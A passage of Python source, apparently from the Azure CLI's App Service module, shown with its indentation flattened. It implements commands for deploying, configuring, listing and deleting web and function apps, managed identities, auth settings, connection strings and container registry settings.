], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current) / float(total))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.utcnow()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ex:
# This SDK function throws an error if Status Code is 200
if ex.status_code != 200:
raise ex
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code != 200:
raise ex
def show_webapp(cmd, resource_group_name, name, slot=None):
return _show_app(cmd, resource_group_name, name, "webapp", slot)
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None, # pylint: disable=unused-argument
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs): # pylint: disable=unused-argument
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.begin_create_or_update_slot if slot else client.web_apps.begin_create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None, force=False):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise ResourceNotFoundError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info, force)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance, force):
general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise ResourceNotFoundError('Could not determine the current plan of the functionapp')
# Ensure all plans involved are windows. Reserved = true indicates Linux.
if src_plan_info.reserved or dest_plan_instance.reserved:
raise ValidationError('This feature currently supports windows to windows plan migrations. For other '
'migrations, please redeploy.')
src_is_premium = is_plan_elastic_premium(cmd, src_plan_info)
dest_is_consumption = is_plan_consumption(cmd, dest_plan_instance)
if not (is_plan_consumption(cmd, src_plan_info) or src_is_premium):
raise ValidationError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
if not (dest_is_consumption or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise ValidationError('You are trying to move to a plan that is not a Consumption or an '
'Elastic Premium plan. ' +
general_switch_msg)
if src_is_premium and dest_is_consumption:
logger.warning('WARNING: Moving a functionapp from Premium to Consumption might result in loss of '
'functionality and cause the app to break. Please ensure the functionapp is compatible '
'with a Consumption plan and is not using any features only available in Premium.')
if not force:
raise RequiredArgumentMissingError('If you want to migrate a functionapp from a Premium to Consumption '
'plan, please re-run this command with the \'--force\' flag.')
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.begin_create_or_update(resource_group_name, name, site_envelope=instance)
def get_functionapp(cmd, resource_group_name, name, slot=None):
function_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not function_app or 'function' not in function_app.kind:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return function_app
def show_functionapp(cmd, resource_group_name, name, slot=None):
return _show_app(cmd, resource_group_name, name, 'functionapp', slot)
def list_webapp(cmd, resource_group_name=None):
full_list = _list_app(cmd.cli_ctx, resource_group_name)
# ignore apps with kind==null & not functions apps
return list(filter(lambda x: x.kind is not None and "function" not in x.kind.lower(), full_list))
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_restore_from_deleted_app',
slot, request)
def list_function_app(cmd, resource_group_name=None):
return list(filter(lambda x: x.kind is not None and "function" in x.kind.lower(),
_list_app(cmd.cli_ctx, resource_group_name)))
def _show_app(cmd, resource_group_name, name, cmd_app_type, slot=None):
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not app:
raise ResourceNotFoundError("Unable to find {} '{}', in RG '{}'.".format(
cmd_app_type, name, resource_group_name))
app_type = _kind_to_app_type(app.kind) if app else None
if app_type != cmd_app_type:
raise ResourceNotFoundError(
"Unable to find {app_type} '{name}', in resource group '{resource_group}'".format(
app_type=cmd_app_type, name=name, resource_group=resource_group_name),
"Use 'az {app_type} show' to show {app_type}s".format(app_type=app_type))
app.site_config = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
_rename_server_farm_props(app)
_fill_ftp_publishing_url(cmd, app, resource_group_name, name, slot)
return app
def _kind_to_app_type(kind):
if "workflow" in kind:
return "logicapp"
if "function" in kind:
return "functionapp"
return "webapp"
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = []
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def _build_identities_info(identities):
from ._appservice_utils import MSI_LOCAL_ID
identities = identities or []
identity_types = []
if not identities or MSI_LOCAL_ID in identities:
identity_types.append('SystemAssigned')
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities:
identity_types.append('UserAssigned')
identity_types = ','.join(identity_types)
info = {'type': identity_types}
if external_identities:
info['userAssignedIdentities'] = {e: {} for e in external_identities}
return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
'ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
_, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_types = ResourceIdentityType.user_assigned
else:
identity_types = ResourceIdentityType.system_assigned
if webapp.identity:
webapp.identity.type = identity_types
else:
webapp.identity = ManagedServiceIdentity(type=identity_types)
if external_identities:
if not webapp.identity.user_assigned_identities:
webapp.identity.user_assigned_identities = {}
for identity in external_identities:
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update',
extra_parameter=webapp, slot=slot)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
web_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not web_app:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return web_app.identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
IdentityType = cmd.get_models('ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
_, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity is None:
return webapp
to_remove = []
existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
if external_identities:
to_remove = {x.lower() for x in external_identities}
non_existing = to_remove.difference(existing_identities)
if non_existing:
raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
if not list(existing_identities - to_remove):
if webapp.identity.type == IdentityType.user_assigned:
webapp.identity.type = IdentityType.none
elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
webapp.identity.type = IdentityType.system_assigned
webapp.identity.user_assigned_identities = None
if remove_local_identity:
webapp.identity.type = (IdentityType.none
if webapp.identity.type == IdentityType.system_assigned or
webapp.identity.type == IdentityType.none
else IdentityType.user_assigned)
if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
webapp.identity.user_assigned_identities = {}
if to_remove:
for identity in list(existing_identities - to_remove):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
else:
for identity in list(existing_identities):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
if runtime_version is None:
return True
if runtime_version.startswith("~") and len(runtime_version) > 1:
try:
int(runtime_version[1:])
except ValueError:
return False
return True
split_versions = runtime_version.split('.')
if len(split_versions) != 3:
return False
for version in split_versions:
try:
int(version)
except ValueError:
return False
return True
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
# validate runtime version
if not is_auth_runtime_version_valid(runtime_version):
raise CLIError('Usage Error: --runtime-version set to invalid value')
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot)
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
return [s['displayName'] for s in runtime_helper.stacks]
def list_runtimes_hardcoded(linux=False):
if linux:
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['linux']]
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['windows']]
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None): # pylint: disable=unused-argument
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': get_az_user_agent()
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p].value,
'type':result.properties[p].type,
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
try:
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
except StopIteration:
pass
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
if not web_app:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
linux_fx = fx_version if (web_app.reserved or not web_app.is_xenon) else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any(linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
vnet_route_all_enabled=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled', 'vnet_route_all_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
# https://github.com/Azure/azure-cli/issues/14857
updating_ip_security_restrictions = False
result = {}
for s in generic_configurations:
try:
json_object = get_json_object(s)
for config_name in json_object:
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
result.update(json_object)
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
setattr(configs, config_name, value)
if not updating_ip_security_restrictions:
setattr(configs, 'ip_security_restrictions', None)
setattr(configs, 'scm_ip_security_restrictions', None)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
